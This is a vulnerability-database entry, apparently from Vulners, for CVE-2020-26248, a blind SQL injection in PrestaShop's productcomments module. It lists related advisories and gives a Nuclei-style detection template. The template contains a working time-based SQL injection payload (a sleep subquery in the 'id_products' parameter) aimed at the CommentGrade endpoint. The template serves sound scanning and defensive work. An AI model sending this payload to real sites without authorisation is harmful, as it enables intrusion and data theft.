| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2020-26248 | 4 Dec 202000:26 | – | circl | |
| Prestashop SQL注入漏洞 | 3 Dec 202000:00 | – | cnnvd | |
| Prestashop SQL Injection Vulnerability (CNVD-2020-70969) | 4 Dec 202000:00 | – | cnvd | |
| Arbitrary Code Injection Over HTTP Traffic (CVE-2020-21176; CVE-2020-25042; CVE-2020-26248; CVE-2020-26712; CVE-2020-28994; CVE-2020-29284; CVE-2020-6308; CVE-2021-25912) | 3 Jan 202100:00 | – | checkpoint_advisories | |
| CVE-2020-26248 | 3 Dec 202020:55 | – | cve | |
| CVE-2020-26248 Blind SQL injection during the CommentGrade process | 3 Dec 202020:55 | – | cvelist | |
| PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection | 16 Dec 202000:00 | – | exploitdb | |
| Blind SQL injection in PrestaShop productcomments module | 20 Jan 202121:33 | – | github | |
| CVE-2020-26248 | 3 Dec 202021:15 | – | nvd | |
| GHSA-5V44-7647-XFW9 Blind SQL injection in PrestaShop productcomments module | 20 Jan 202121:33 | – | osv |
id: CVE-2020-26248
info:
name: PrestaShop Product Comments <4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: Fixed in 4.2.1.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
- https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
epss-score: 0.12388
epss-percentile: 0.95719
cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 1
vendor: prestashop
product: productcomments
framework: prestashop
tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop,vuln
http:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 490a0046304402204d4b92d96eeb5083034fd44edf67ccda2ee406c4aaf5e69e00fd06c12e8833ac022054af34851e389d47e845e568712539c9277232b190250e582b2ebf86f42bd3c0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation